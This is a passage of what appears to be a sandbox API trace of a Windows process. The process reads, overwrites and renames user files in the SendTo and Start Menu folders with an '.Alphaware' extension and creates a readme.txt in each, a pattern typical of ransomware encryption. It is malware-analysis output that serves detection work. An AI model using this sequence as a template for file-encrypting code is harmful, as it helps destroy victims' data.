ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1 [0099.818] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0099.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0099.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0099.819] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini", dwFileAttributes=0x80) returned 1 [0099.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.822] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x255e4b0 | out: lpFileInformation=0x255e4b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e)) returned 1 [0099.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.822] ReadFile (in: hFile=0x250, lpBuffer=0x255e990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x255e990*, lpNumberOfBytesRead=0x23e958*=0x22e, lpOverlapped=0x0) returned 1 [0099.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.845] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8db6a140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4)) returned 1 [0099.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.848] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini.alphaware")) returned 1 [0099.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0099.848] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0099.851] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk", dwFileAttributes=0x80) returned 1 [0099.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25e4628 | out: lpFileInformation=0x25e4628*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6)) returned 1 [0099.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.852] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.852] ReadFile (in: hFile=0x250, lpBuffer=0x25e4df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25e4df0*, lpNumberOfBytesRead=0x23e958*=0x4d6, lpOverlapped=0x0) returned 1 [0099.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.878] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.881] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dbb6400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x748)) returned 1 [0099.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.881] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.alphaware")) returned 1 [0099.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8dbb6400, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dbb6400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3bb52ab9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink", cAlternateFileName="DESKTO~1.DES")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8db6a140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dbb6400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x748, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk.Alphaware", cAlternateFileName="FAXREC~1.ALP")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8db6a140, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8db6a140, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8db6a140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0099.882] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8db6a140, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8db6a140, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8db6a140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0099.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0099.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0099.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0099.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e800a60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0099.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0 [0099.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0099.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0099.883] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini", dwFileAttributes=0x80) returned 1 [0099.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.886] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x246ac28 | out: lpFileInformation=0x246ac28*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e800a60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0099.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.886] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.886] ReadFile (in: hFile=0x250, lpBuffer=0x246af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246af98*, lpNumberOfBytesRead=0x23e958*=0xae, lpOverlapped=0x0) returned 1 [0099.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.911] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dc026c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4)) returned 1 [0099.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.916] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini.alphaware")) returned 1 [0099.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0099.918] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0099.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8dc026c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dc026c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dc026c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc026c0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8dc026c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dc026c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc026c0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8dc026c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dc026c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0099.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0099.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0099.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0099.921] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e851370, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed81570, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: 